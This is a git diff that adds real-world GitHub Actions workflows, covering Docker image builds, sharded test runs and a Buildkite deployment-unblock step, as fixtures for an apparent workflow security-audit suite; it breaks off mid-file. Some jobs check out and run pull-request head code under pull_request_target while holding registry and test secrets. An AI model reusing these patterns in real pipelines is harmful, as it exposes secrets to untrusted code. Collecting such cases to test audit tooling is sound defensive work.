+ - name: Login to Quay + uses: nick-fields/retry@v3 + with: + timeout_seconds: 120 + max_attempts: 3 + retry_wait_seconds: 10 + command: echo "$QUAY_PASSWORD" | docker login quay.io -u "$QUAY_USERNAME" --password-stdin + env: + QUAY_USERNAME: ${{ secrets.QUAY_USERNAME }} + QUAY_PASSWORD: ${{ secrets.QUAY_PASSWORD }} + - name: Build and push base image + env: + WEB_BASE_REPO: quay.io/gumroad/web_base + run: | + set -e + GREEN='\033[0;32m' + NC='\033[0m' + logger() { + echo -e "${GREEN}$(date '+%Y/%m/%d %H:%M:%S') build.sh: $1${NC}" + } + logger "pulling quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye" + docker pull --quiet quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye + WEB_BASE_SHA=$(WEB_BASE_DOCKERFILE_FROM=quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye docker/base/generate_tag_for_web_base.sh) + if ! docker manifest inspect $WEB_BASE_REPO:$WEB_BASE_SHA > /dev/null 2>&1; then + logger "Building $WEB_BASE_REPO:$WEB_BASE_SHA" + NEW_BASE_REPO=$WEB_BASE_REPO \ + WEB_BASE_DOCKERFILE_FROM=quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye \ + BUNDLE_GEMS__CONTRIBSYS__COM=${{ secrets.BUNDLE_GEMS__CONTRIBSYS__COM }} \ + make build_base + + logger "Pushing $WEB_BASE_REPO:$WEB_BASE_SHA" + for i in {1..3}; do + logger "Push attempt $i" + if docker push --quiet $WEB_BASE_REPO:$WEB_BASE_SHA; then + logger "Pushed $WEB_BASE_REPO:$WEB_BASE_SHA" + break + elif [ $i -eq 3 ]; then + logger "Failed to push $WEB_BASE_REPO:$WEB_BASE_SHA" + exit 1 + else + sleep 5 + fi + done + else + logger "$WEB_BASE_REPO:$WEB_BASE_SHA already exists" + fi + + build_test: + runs-on: ubicloud-standard-4 + name: Build test image${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name == github.repository && ' (internal PR noop)' || '' }} + needs: build_base + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + persist-credentials: false + - name: Login to Quay + uses: nick-fields/retry@v3 + with: + timeout_seconds: 120 + max_attempts: 3 + retry_wait_seconds: 10 + command: echo "$QUAY_PASSWORD" | docker login quay.io -u "$QUAY_USERNAME" --password-stdin + env: + QUAY_USERNAME: ${{ secrets.QUAY_USERNAME }} + QUAY_PASSWORD: ${{ secrets.QUAY_PASSWORD }} + - name: Build and push test image + env: + WEB_BASE_REPO: quay.io/gumroad/web_base + WEB_BASE_TEST_REPO: quay.io/gumroad/web_base_test + WEB_REPO: quay.io/gumroad/web + REVISION: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + run: | + set -e + GREEN='\033[0;32m' + NC='\033[0m' + logger() { + echo -e "${GREEN}$(date '+%Y/%m/%d %H:%M:%S') build.sh: $1${NC}" + } + docker pull --quiet quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye + WEB_BASE_TEST_SHA=$(WEB_BASE_DOCKERFILE_FROM=quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye docker/base/generate_tag_for_web_base_test.sh) + build_and_push() { + local repo=$1 + local tag=$2 + local make_target=$3 + if ! docker manifest inspect $repo:$tag > /dev/null 2>&1; then + logger "building $repo:$tag" + NEW_BASE_REPO=$WEB_BASE_REPO NEW_WEB_BASE_TEST_REPO=$WEB_BASE_TEST_REPO NEW_WEB_REPO=$WEB_REPO \ + WEB_BASE_DOCKERFILE_FROM=quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye \ + BRANCH_CACHE_UPLOAD_ENABLED=false \ + BRANCH_CACHE_RESTORE_ENABLED=false \ + NEW_WEB_TAG=$REVISION \ + COMPOSE_PROJECT_NAME=web_${{ github.run_id }}_${{ github.run_attempt }} \ + make $make_target + logger "pushing $repo:$tag" + for i in {1..3}; do + logger "Push attempt $i" + if docker push --quiet $repo:$tag; then + logger "Pushed $repo:$tag" + break + elif [ $i -eq 3 ]; then + logger "Failed to push $repo:$tag" + exit 1 + else + sleep 5 + fi + done + else + logger "$repo:$tag already exists" + fi + } + + build_and_push $WEB_BASE_TEST_REPO $WEB_BASE_TEST_SHA build_base_test + build_and_push $WEB_REPO test-$REVISION build_test + + test_fast: + name: Test Fast ${{ matrix.ci_node_index }}${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name == github.repository && ' (internal PR noop)' || '' }} + env: + COMPOSE_PROJECT_NAME: web_${{ github.run_id }}_${{ github.run_attempt }}_fast_${{ matrix.ci_node_index }} + runs-on: ubicloud-standard-4 + needs: build_test + strategy: + fail-fast: false + matrix: + ci_node_total: [15] + ci_node_index: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14] + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + persist-credentials: false + - name: Login to Quay + uses: nick-fields/retry@v3 + with: + timeout_seconds: 120 + max_attempts: 3 + retry_wait_seconds: 10 + command: echo "$QUAY_PASSWORD" | docker login quay.io -u "$QUAY_USERNAME" --password-stdin + env: + QUAY_USERNAME: ${{ secrets.QUAY_USERNAME }} + QUAY_PASSWORD: ${{ secrets.QUAY_PASSWORD }} + - name: Start services + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 10 + command: docker compose -f docker/docker-compose-test-and-ci.yml up -d + env: + COMPOSE_HTTP_TIMEOUT: "300" + - name: Wait for services + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 5 + command: | + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh db_test 3306 + + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh elasticsearch 9200 + + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh minio 9000 + env: + WEB_REPO: quay.io/gumroad/web + - name: Setup test database + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 10 + command: | + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + -e RAILS_ENV=test \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + bundle exec rake db:setup + env: + WEB_REPO: quay.io/gumroad/web + + - name: Run tests + env: + WEB_REPO: quay.io/gumroad/web + KNAPSACK_PRO_BRANCH: ${{ github.event_name == 'pull_request_target' && github.head_ref || github.ref_name }} + run: | + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + -e RUBY_YJIT_ENABLE=1 \ + -e KNAPSACK_PRO_TEST_SUITE_TOKEN_RSPEC=${{ secrets.KNAPSACK_PRO_TEST_SUITE_TOKEN_RSPEC_FAST }} \ + -e KNAPSACK_PRO_CI_NODE_TOTAL=${{ matrix.ci_node_total }} \ + -e KNAPSACK_PRO_CI_NODE_INDEX=${{ matrix.ci_node_index }} \ + -e KNAPSACK_PRO_LOG_LEVEL=info \ + -e KNAPSACK_PRO_RSPEC_SPLIT_BY_TEST_EXAMPLES=true \ + -e KNAPSACK_PRO_TEST_FILE_PATTERN="spec/**/*_spec.rb" \ + -e KNAPSACK_PRO_TEST_FILE_EXCLUDE_PATTERN="spec/requests/**/*_spec.rb" \ + -e KNAPSACK_PRO_COMMIT_HASH=${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + -e KNAPSACK_PRO_BRANCH="$KNAPSACK_PRO_BRANCH" \ + -e KNAPSACK_PRO_CI_NODE_BUILD_ID=${{ github.run_id }} \ + -e KNAPSACK_PRO_CI_NODE_RETRY_COUNT=${{ github.run_attempt }} \ + -e KNAPSACK_PRO_PROJECT_DIR=/app \ + -e KNAPSACK_PRO_FIXED_QUEUE_SPLIT=true \ + -e CI=true \ + -e IN_DOCKER=true \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + /usr/local/bin/gosu app bundle exec rake "knapsack_pro:queue:rspec[--format RSpec::Github::Formatter --tag ~skip --format progress]" + timeout-minutes: 15 + - name: Clean up + if: always() + run: | + docker compose -f docker/docker-compose-test-and-ci.yml down -v 2>/dev/null || true + docker rm -f $(docker ps -aq -f name=${{ env.COMPOSE_PROJECT_NAME }}) 2>/dev/null || true + docker volume rm $(docker volume ls -q -f name=${{ env.COMPOSE_PROJECT_NAME }}) 2>/dev/null || true + docker network rm ${{ env.COMPOSE_PROJECT_NAME }}_default 2>/dev/null || true + + test_slow: + name: Test Slow ${{ matrix.ci_node_index }}${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name == github.repository && ' (internal PR noop)' || '' }} + env: + COMPOSE_PROJECT_NAME: web_${{ github.run_id }}_${{ github.run_attempt }}_slow_${{ matrix.ci_node_index }} + WEB_REPO: quay.io/gumroad/web + runs-on: ubicloud-standard-4 + needs: build_test + strategy: + fail-fast: false + matrix: + ci_node_total: [45] + ci_node_index: + [ + 0, + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8, + 9, + 10, + 11, + 12, + 13, + 14, + 15, + 16, + 17, + 18, + 19, + 20, + 21, + 22, + 23, + 24, + 25, + 26, + 27, + 28, + 29, + 30, + 31, + 32, + 33, + 34, + 35, + 36, + 37, + 38, + 39, + 40, + 41, + 42, + 43, + 44, + ] + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + persist-credentials: false + - name: Login to Quay + uses: nick-fields/retry@v3 + with: + timeout_seconds: 120 + max_attempts: 3 + retry_wait_seconds: 10 + command: echo "$QUAY_PASSWORD" | docker login quay.io -u "$QUAY_USERNAME" --password-stdin + env: + QUAY_USERNAME: ${{ secrets.QUAY_USERNAME }} + QUAY_PASSWORD: ${{ secrets.QUAY_PASSWORD }} + - name: Start services + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 10 + command: docker compose -f docker/docker-compose-test-and-ci.yml up -d + env: + COMPOSE_HTTP_TIMEOUT: "300" + - name: Wait for services + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 5 + command: | + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh db_test 3306 + + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh elasticsearch 9200 + + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh minio 9000 + env: + WEB_REPO: quay.io/gumroad/web + - name: Setup test database + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 10 + command: | + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + -e RAILS_ENV=test \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + bundle exec rake db:setup + env: + WEB_REPO: quay.io/gumroad/web + + - name: Run tests + env: + RUBY_YJIT_ENABLE: 1 + KNAPSACK_PRO_TEST_SUITE_TOKEN_RSPEC: ${{ secrets.KNAPSACK_PRO_TEST_SUITE_TOKEN_RSPEC_FAST }} + KNAPSACK_PRO_CI_NODE_TOTAL: ${{ matrix.ci_node_total }} + KNAPSACK_PRO_CI_NODE_INDEX: ${{ matrix.ci_node_index }} + KNAPSACK_PRO_LOG_LEVEL: info + KNAPSACK_PRO_RSPEC_SPLIT_BY_TEST_EXAMPLES: true + KNAPSACK_PRO_TEST_FILE_PATTERN: "spec/requests/**/*_spec.rb" + KNAPSACK_PRO_COMMIT_HASH: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + KNAPSACK_PRO_BRANCH: ${{ github.event_name == 'pull_request_target' && github.head_ref || github.ref_name }} + KNAPSACK_PRO_CI_NODE_BUILD_ID: ${{ github.run_id }} + KNAPSACK_PRO_CI_NODE_RETRY_COUNT: ${{ github.run_attempt }} + KNAPSACK_PRO_PROJECT_DIR: /app + KNAPSACK_PRO_FIXED_QUEUE_SPLIT: true + CI: true + IN_DOCKER: true + WEB_REPO: quay.io/gumroad/web + run: | + # Create local directory for artifacts + mkdir -p ./capybara-artifacts + chmod 777 ./capybara-artifacts + mkdir -p ./test-logs + chmod 777 ./test-logs + + # Run tests with volume mount to capture capybara artifacts and test logs + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + -v "$(pwd)/capybara-artifacts:/app/tmp/capybara" \ + -v "$(pwd)/test-logs:/app/log" \ + -e RUBY_YJIT_ENABLE \ + -e KNAPSACK_PRO_TEST_SUITE_TOKEN_RSPEC \ + -e KNAPSACK_PRO_CI_NODE_TOTAL \ + -e KNAPSACK_PRO_CI_NODE_INDEX \ + -e KNAPSACK_PRO_LOG_LEVEL \ + -e KNAPSACK_PRO_RSPEC_SPLIT_BY_TEST_EXAMPLES \ + -e KNAPSACK_PRO_TEST_FILE_PATTERN \ + -e KNAPSACK_PRO_COMMIT_HASH \ + -e KNAPSACK_PRO_BRANCH \ + -e KNAPSACK_PRO_CI_NODE_BUILD_ID \ + -e KNAPSACK_PRO_CI_NODE_RETRY_COUNT \ + -e KNAPSACK_PRO_PROJECT_DIR \ + -e KNAPSACK_PRO_FIXED_QUEUE_SPLIT \ + -e CI \ + -e IN_DOCKER \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + /usr/local/bin/gosu app bundle exec rake "knapsack_pro:queue:rspec[--format RSpec::Github::Formatter --tag ~skip --format progress]" + timeout-minutes: 20 + - name: Archive capybara artifacts + if: failure() + uses: actions/upload-artifact@v4 + with: + name: capybara-screenshots-slow-${{ matrix.ci_node_index }}-attempt-${{ github.run_attempt }} + path: ./capybara-artifacts/*.png + retention-days: 7 + if-no-files-found: ignore + - name: Archive test logs + if: failure() + uses: actions/upload-artifact@v4 + with: + name: test-logs-slow-${{ matrix.ci_node_index }}-attempt-${{ github.run_attempt }} + path: ./test-logs/test.log + retention-days: 7 + if-no-files-found: ignore + - name: Clean up + if: always() + run: | + docker compose -f docker/docker-compose-test-and-ci.yml down -v 2>/dev/null || true + docker rm -f $(docker ps -aq -f name=${{ env.COMPOSE_PROJECT_NAME }}) 2>/dev/null || true + docker volume rm $(docker volume ls -q -f name=${{ env.COMPOSE_PROJECT_NAME }}) 2>/dev/null || true + docker network rm ${{ env.COMPOSE_PROJECT_NAME }}_default 2>/dev/null || true + + unblock_deployment_from_buildkite: + name: Unblock deployment from Buildkite + runs-on: ubicloud-standard-2 + needs: [test_fast, test_slow] + if: success() && github.event_name == 'push' && github.ref == 'refs/heads/main' + steps: + - name: Unblock corresponding Buildkite build + uses: nick-fields/retry@v3 + with: + timeout_seconds: 20 + retry_wait_seconds: 300 + max_attempts: 3 + command: | + if [ "$UNBLOCK_DEPLOYMENT" != "true" ]; then + echo "UNBLOCK_DEPLOYMENT_FROM_BUILDKITE is not set to 'true'. Skipping unblock." + exit 0 + fi + + echo "Looking for Buildkite build for commit $COMMIT_SHA on pipeline $ORG_SLUG/$PIPELINE_SLUG..." + # Fetch builds for the specific commit, including jobs + BUILD_DATA=$(curl -s -H "Authorization: Bearer $BUILDKITE_API_TOKEN" \ + "https://api.buildkite.com/v2/organizations/$ORG_SLUG/pipelines/$PIPELINE_SLUG/builds?commit=$COMMIT_SHA&include_retried_jobs=true") + + # Extract the latest build number that is currently blocked for this commit + BUILD_NUMBER=$(echo "$BUILD_DATA" | jq -r --arg commit "$COMMIT_SHA" '[.[] | select(.commit == $commit and .blocked == true)] | sort_by(.created_at) | last | .number // empty') + + if [ -z "$BUILD_NUMBER" ]; then + echo "No blocked Buildkite build found for commit $COMMIT_SHA on pipeline $ORG_SLUG/$PIPELINE_SLUG." + exit 1 + fi + + echo "Found blocked Buildkite build number: $BUILD_NUMBER. Fetching job details..." + # Fetch detailed data for the specific build to get job IDs + BUILD_DETAIL_DATA=$(curl -s -H "Authorization: Bearer $BUILDKITE_API_TOKEN" \ + "https://api.buildkite.com/v2/organizations/$ORG_SLUG/pipelines/$PIPELINE_SLUG/builds/$BUILD_NUMBER") + + # Extract the job ID for the block step with key "require-approval" + BLOCK_JOB_ID=$(echo "$BUILD_DETAIL_DATA" | jq -r '.jobs[] | select(.type == "manual" and .step_key == "require-approval") | .id // empty') + + if [ -z "$BLOCK_JOB_ID" ]; then + echo "No block job with key 'require-approval' found in build $BUILD_NUMBER." + exit 1 + fi + + echo "Found block job ID: $BLOCK_JOB_ID for build $BUILD_NUMBER. Attempting to unblock job..." + # Send the unblock request using PUT to the job-specific endpoint + RESPONSE_CODE=$(curl -s -o /dev/null -w "%{http_code}" -X PUT \ + -H "Authorization: Bearer $BUILDKITE_API_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{}' \ + "https://api.buildkite.com/v2/organizations/$ORG_SLUG/pipelines/$PIPELINE_SLUG/builds/$BUILD_NUMBER/jobs/$BLOCK_JOB_ID/unblock") + + # Check the response code + if [ "$RESPONSE_CODE" -ge 200 ] && [ "$RESPONSE_CODE" -lt 300 ]; then + echo "Successfully sent unblock request for job $BLOCK_JOB_ID in build $BUILD_NUMBER. Response code: $RESPONSE_CODE" + else + echo "Error sending unblock request for job $BLOCK_JOB_ID in build $BUILD_NUMBER. Response code: $RESPONSE_CODE" + # Attempt to fetch error details from Buildkite if available + ERROR_DETAILS=$(curl -s -H "Authorization: Bearer $BUILDKITE_API_TOKEN" \ + "https://api.buildkite.com/v2/organizations/$ORG_SLUG/pipelines/$PIPELINE_SLUG/builds/$BUILD_NUMBER/jobs/$BLOCK_JOB_ID") + echo "API Response details for failed unblock: $ERROR_DETAILS" + exit 1 # Exit with error if the API call failed + fi + env: + UNBLOCK_DEPLOYMENT: ${{ secrets.UNBLOCK_DEPLOYMENT_FROM_BUILDKITE }} + BUILDKITE_API_TOKEN: ${{ secrets.BUILDKITE_API_TOKEN }} + COMMIT_SHA: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + ORG_SLUG: gumroad-inc + PIPELINE_SLUG: ${{ secrets.BUILDKITE_PIPELINE_SLUG }} diff --git a/test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain/.github/workflows/runtime_build_and_test.yml b/test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain/.github/workflows/runtime_build_and_test.yml new file mode 100644 index 0000000..f4b914a --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain/.github/workflows/runtime_build_and_test.yml @@ -0,0 +1,933 @@ +name: (Runtime) Build and Test + +on: + push: + branches: [main] + tags: + # To get CI for backport releases. + # This will duplicate CI for releases from main which is acceptable + - "v*" + pull_request: + paths-ignore: + - compiler/** + workflow_dispatch: + inputs: + commit_sha: + required: false + type: string + default: "" + +permissions: {} + +concurrency: + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.event.pull_request.number || github.run_id }} + cancel-in-progress: true + +env: + TZ: /usr/share/zoneinfo/America/Los_Angeles + # https://github.com/actions/cache/blob/main/tips-and-workarounds.md#cache-segment-restore-timeout + SEGMENT_DOWNLOAD_TIMEOUT_MINS: 1 + +jobs: + # ----- NODE_MODULES CACHE ----- + # Centralize the node_modules cache so it is saved once and each subsequent job only needs to + # restore the cache. Prevents race conditions where multiple workflows try to write to the cache. + runtime_node_modules_cache: + name: Cache Runtime node_modules + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - name: Check cache hit + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + lookup-only: true + - uses: actions/setup-node@v4 + if: steps.node_modules.outputs.cache-hit != 'true' + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Warm with old cache + if: steps.node_modules.outputs.cache-hit != 'true' + uses: actions/cache/restore@v4 + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Save cache + if: steps.node_modules.outputs.cache-hit != 'true' + uses: actions/cache/save@v4 + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + + runtime_compiler_node_modules_cache: + name: Cache Runtime, Compiler node_modules + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - name: Check cache hit + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + lookup-only: true + - uses: actions/setup-node@v4 + if: steps.node_modules.outputs.cache-hit != 'true' + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: | + yarn.lock + compiler/yarn.lock + - name: Warm with old cache + if: steps.node_modules.outputs.cache-hit != 'true' + uses: actions/cache/restore@v4 + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd compiler install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Save cache + if: steps.node_modules.outputs.cache-hit != 'true' + uses: actions/cache/save@v4 + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + + # ----- FLOW ----- + discover_flow_inline_configs: + name: Discover flow inline configs + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.set-matrix.outputs.result }} + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/github-script@v7 + id: set-matrix + with: + script: | + const inlinedHostConfigs = require('./scripts/shared/inlinedHostConfigs.js'); + return inlinedHostConfigs.map(config => config.shortName); + + flow: + name: Flow check ${{ matrix.flow_inline_config_shortname }} + needs: [discover_flow_inline_configs, runtime_node_modules_cache] + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + flow_inline_config_shortname: ${{ fromJSON(needs.discover_flow_inline_configs.outputs.matrix) }} + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: node ./scripts/tasks/flow-ci ${{ matrix.flow_inline_config_shortname }} + + # ----- FIZZ ----- + check_generated_fizz_runtime: + name: Confirm generated inline Fizz runtime is up to date + needs: [runtime_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: | + yarn generate-inline-fizz-runtime + git diff --exit-code || (echo "There was a change to the Fizz runtime. Run \`yarn generate-inline-fizz-runtime\` and check in the result." && false) + + # ----- FEATURE FLAGS ----- + flags: + name: Check flags + needs: [runtime_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn flags + + # ----- TESTS ----- + test: + name: yarn test ${{ matrix.params }} (Shard ${{ matrix.shard }}) + needs: [runtime_compiler_node_modules_cache] + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + params: + - "-r=stable --env=development" + - "-r=stable --env=production" + - "-r=experimental --env=development" + - "-r=experimental --env=production" + - "-r=www-classic --env=development --variant=false" + - "-r=www-classic --env=production --variant=false" + - "-r=www-classic --env=development --variant=true" + - "-r=www-classic --env=production --variant=true" + - "-r=www-modern --env=development --variant=false" + - "-r=www-modern --env=production --variant=false" + - "-r=www-modern --env=development --variant=true" + - "-r=www-modern --env=production --variant=true" + - "-r=xplat --env=development --variant=false" + - "-r=xplat --env=development --variant=true" + - "-r=xplat --env=production --variant=false" + - "-r=xplat --env=production --variant=true" + # TODO: Test more persistent configurations? + - "-r=stable --env=development --persistent" + - "-r=experimental --env=development --persistent" + shard: + - 1/5 + - 2/5 + - 3/5 + - 4/5 + - 5/5 + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: | + yarn.lock + compiler/yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd compiler install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: node --version + - run: yarn test ${{ matrix.params }} --ci --shard=${{ matrix.shard }} + + # Hardcoded to improve parallelism + test-linter: + name: Test eslint-plugin-react-hooks + needs: [runtime_compiler_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: | + yarn.lock + compiler/yarn.lock + - name: Restore cached node_modules + uses: actions/cache@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + - name: Install runtime dependencies + run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Install compiler dependencies + run: yarn install --frozen-lockfile + working-directory: compiler + if: steps.node_modules.outputs.cache-hit != 'true' + - run: ./scripts/react-compiler/build-compiler.sh && ./scripts/react-compiler/link-compiler.sh + - run: yarn workspace eslint-plugin-react-hooks test + + # ----- BUILD ----- + build_and_lint: + name: yarn build and lint + needs: [runtime_compiler_node_modules_cache] + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + # yml is dumb. update the --total arg to yarn build if you change the number of workers + worker_id: + [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 